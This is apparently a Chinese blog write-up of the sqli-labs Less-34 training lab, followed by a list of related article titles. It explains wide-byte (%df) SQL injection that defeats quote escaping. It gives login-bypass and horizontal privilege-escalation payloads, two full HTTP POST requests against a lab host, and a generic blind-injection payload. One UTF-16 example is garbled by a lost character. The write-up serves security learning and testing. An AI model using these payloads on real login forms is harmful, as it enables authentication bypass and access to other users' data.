sqli-labs————Less-34(寬位元組繞過、水平越權、盲注)
Less-34
方法一:
這一關是POST型的注入,同樣的將post傳遞過來的內容進行了轉義處理,過濾了單引號、反斜槓。有之前的例子我們可以看到%df可以將轉義的反斜槓給吃掉。而GET型的方式我們是以url形式提交的,因此資料會通過urlencode,如何將方法用在POST型的注入當中呢?我們可以將UTF-8轉換為UTF-16或者UTF-32,例如將'轉換為utf-16為: �'。我們可以利用這一點注入。
使用萬能密碼方式來突破:
username: �'or 1=1#
passwor:aaa
方法二:
因為這裡使用到了表單的提交,所以我們可以使用burp suite進行資料的提交,之後對提交的資料進行修改:
POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1
uname=admin%df'||1#&passwd=aaa&submit=Submit
從上面我們可以看到,我們並沒有輸入密碼,卻成功登入了,已越權
或者可以這樣,獲取別的使用者的資訊,實現水平越權:
POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1
uname=admin%df'or 1 limit 1,1#&passwd=aaa&submit=Submit
post型盲注通殺payload:
uname=admin%df'or()or%200%23&passwd=&submit=Submit
相關文章
- sqli-labs————寬位元組注入(可以用於繞過濾了單引號或者\的WAF)SQL
- 寬位元組注入
- 水平越權跟垂直越權區別?
- sqli-labs靶場實現(九)【寬位元組注入(1)、寬位元組注入(2)】(less-33、less-32具體步驟+圖文詳解)SQL
- sqli-labs ————less -27(union、SELECT、繞過濾)SQL
- sqli-labs ————less -27a(union、SELECT、繞過濾)SQL
- 三十三:WEB漏洞-邏輯越權之水平垂直越權Web
- 布林型盲注 時間型盲注
- 寬位元組XSS跨站攻擊
- 基於pikachu靶場的水平越權詳解
- sql注入——盲注SQL
- MySQL手注之盲注(布林)MySql
- sqli-labs————Less-26(繞空格、/*、#等)SQL
- Java安全之Filter許可權繞過JavaFilter
- 一位元控制所有:透過一位元繞過Windows 10保護Windows
- js繞過-前端加密繞過JS前端加密
- KASLR繞過及提權利用(CVE-2023-35001)
- 怎麼繞過許可權看朋友圈
- 最新寬位元組注入攻擊和程式碼分析技術
- 測試能力達到什麼水平,才能進阿里跟位元組?阿里
- 使用CBC位元反轉攻擊繞過加密的會話令牌加密會話
- 關於位元組遊戲,2021年該關注這些遊戲
- C10-08-寬位元組注入-mysql注入之getshell-sqlmapMySql
- 越權漏洞(一)
- 越權漏洞(二)
- WEB安全新玩法 [5] 防範水平越權之檢視他人訂單資訊Web
- 6.6水平垂直越權
- SQL隱碼攻擊——時間盲注SQL
- 利用DNS日誌進行MySQL盲注DNSMySql
- 我的越權之道
- eMarketer:區塊鏈越來越受營銷行業關注區塊鏈行業
- WAF繞過之道
- 布林盲注web入門190-194Web
- 硬核觀察 | “祝融號”火星車目前頻寬每秒只能傳 2 個位元組
- MPAA:好萊塢發展將越來越繞不開中國和 Netflix
- 位元組碼
- 位元組流
- 越權漏洞(四)完結